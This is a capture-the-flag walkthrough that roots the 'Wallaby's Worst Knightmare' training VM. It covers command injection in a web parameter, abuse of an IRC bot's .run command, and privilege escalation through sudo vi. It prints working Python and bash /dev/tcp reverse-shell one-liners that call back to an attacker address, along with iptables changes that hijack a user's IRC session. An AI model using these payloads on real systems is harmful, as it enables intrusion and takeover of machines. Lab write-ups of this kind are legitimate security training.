This VM is really awesome, especially the privilege escalation part! Let’s hack it!
RCE IS YOUR FRIEND
First of all I discovered the open ports of the VM:
nmap 192.168.1.11 -p 1-65535
And I got this:
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 18:59 CET Nmap scan report for 192.168.1.11 Host is up (0.0081s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6667/tcp filtered irc Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds
I browsed to http://192.168.1.11 and I found a submit form which said:
Enter a username to get started with this CTF!
Cool, I typed ReverseBrain and I pressed the submit button. I got a redirect to a page which suggested me some tips, at the end of the page there were a link to start the VM. I pressed on Start the CTF! and I got redirect to http://192.168.1.11/?page=home. The first thing that I tried was a LFI on page parameter: http://192.168.1.11/?page=../../../../../../etc/passwd and I got:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false walfin:x:1000:1000:walfin,,,:/home/walfin:/bin/bash sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false steven?:x:1001:1001::/home/steven?:/bin/bash ircd:x:1003:1003:,,,:/home/ircd:/bin/bash
Seems that the LFI worked! Looking into the source code of the page I noticed an HTML comment:
This is what we call 'dis-information' in the cyber security world! Are you learning anything new here ReverseBrain
Grrrr, it was an honeypot… Let’s see if we got /etc/passwd with http://192.168.1.11/?page=../../../../../../etc/shadow but I got this:
That's some fishy stuff you're trying there ReverseBrain buddy. You must think Wallaby codes like a monkey! I better get to securing this SQLi though... (Wallaby caught you trying an LFI, you gotta be sneakier! Difficulty level has increased.)
Now I tried to navigate around the website but seems the port 80 was close. So I retried an nmap scan:
nmap 192.168.1.11 -p 1-65535
And I discovered that the web server switched to another port:
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 19:10 CET Nmap scan report for 192.168.1.11 Host is up (0.0082s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 6667/tcp filtered irc 60080/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds
So I browsed to http://192.168.1.11:60080/ and on the new web page there was an image and a phrase which said:
HOLY MOLY, this guy ReverseBrain wants me...Glad I moved to a different port so I could work more securely!!!
Eheheheh, now I tried to bruteforce the pages. I browsed to http://192.168.1.11:60080/?page=test and I got an error:
Dude, ReverseBrain what are you trying over here?!
Now I reloaded the page intercepting the GET request with BurpSuite, I sent it to Intruder with the following payload:
GET /?page=§test§ HTTP/1.1 Host: 192.168.1.11:60080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close
I used raft-small-directories-lowercase.txt as wordlist and I found index, home, mailer and blacklist. I browsed to http://192.168.1.11:60080/?page=mailer and there was only a Coming soon guys! blue header. Into the source code I found a comment which said:
/?page=mailer&mail=mail wallaby "message goes here"
So I tried to verify if the mail parameter was affected by RCE vulnerability. So I tried http://192.168.1.11:60080/?page=mailer&mail=id and I got:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Cool! Now I can get a reverse shell. First of all I started listen locally:
nc -lvp 1234
Then I typed:
http://192.168.1.11:60080/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now I have a reverse shell and I got a TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
Now I need to escalate privileges.
TAKE CARE ABOUT THE IRC BOTS!
First of all I tried:
This is the output:
Matching Defaults entries for www-data on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ubuntu: (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf (ALL) NOPASSWD: /sbin/iptables
So I can modify the iptables as root. I took a look on the processes too:
waldo 727 0.0 0.5 29416 2924 ? Ss 09:55 0:00 tmux new-session -d -s irssi waldo 729 0.0 0.1 4508 700 pts/0 Ss 09:55 0:00 -sh waldo 749 0.0 1.7 115744 8520 pts/0 Sl+ 09:55 0:00 irssi wallaby 977 0.0 4.9 516868 24964 ? Sl 09:55 0:00 /usr/bin/python3 /usr/bin/sopel -d --quiet
Seems that waldo is connected to the IRC server which is not accessible from the external network and seems to be an IRC bot too made with Sopel and started from wallaby. First of all check the iptables:
Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT tcp -- 127.0.0.1 0.0.0.0/0 tcp dpt:6667 DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:6667 Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination
As I suspected the iptables DROP the request to IRC port 6667 if they come from 0.0.0.0 but not from localhost. Remove this chain and add a new one:
sudo iptables -D INPUT -p tcp -m tcp --dport 6667 -j DROP sudo iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6667 -j ACCEPT
Now I can connect to IRC server from HexChat which is already installed into my Kali box. I added a new server called CTF with the following IP/Port: 192.168.1.11/6667. I found the only available channel which was #wallabyschat (from irssi inside the exploited VM). So I joined it:
There were 3 users: me, waldo (who was the channel operator) and wallabysbot. The bot is made with Sopel which accepts lot of command included .run. I typed it and I got a response from the bot:
Hold on, you aren't Waldo?
I analyzed the command browsing to /home/wallaby/.sopel/modules and I found run.py:
import sopel.module, subprocess, os from sopel.module import example @sopel.module.commands('run') @example('.run ls') def run(bot, trigger): if trigger.owner: os.system('%s' % trigger.group(2)) runas1 = subprocess.Popen('%s' % trigger.group(2), stdout=subprocess.PIPE).communicate() runas = str(runas1) bot.say(' '.join(runas.split('\\n'))) else: bot.say('Hold on, you aren\'t Waldo?')
Nice! There is a RCE vulnerability but I need to be logged as waldo first. So I edited the iptables:
sudo iptables -D INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT sudo iptables -A OUTPUT -o enp0s17 -s 127.0.0.1 -p tcp --dport 6667 -m owner --uid-owner waldo -j DROP
After some minutes waldo got a timeout error. After that I changed my nick:
Now I exploited the RCE vulnerability:
It worked! I started listen locally:
nc -lvp 1235
Then I sent to the bot this string.
.run python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.14",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now I have another reverse shell as wallaby, I got a TTY and I typed:
This is the output:
Matching Defaults entries for wallaby on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User wallaby may run the following commands on ubuntu: (ALL) NOPASSWD: ALL
I can run all commands with sudo. So I typed:
export TERM=xterm sudo vi
Then I pressed ESC to enter into command mode, then I pressed ENTER. Now I started listen locally:
nc -lvp 1236
Now from vi I typed:
:!bash -i >& /dev/tcp/192.168.1.14/1236 0>&1
Now I got a shell as root. Browsing into /root I found flag.txt:
###CONGRATULATIONS### You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!! This was my first vulnerable machine/CTF ever! I hope you guys enjoyed playing it as much as I enjoyed making it! Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it. Thanks guys! -Waldo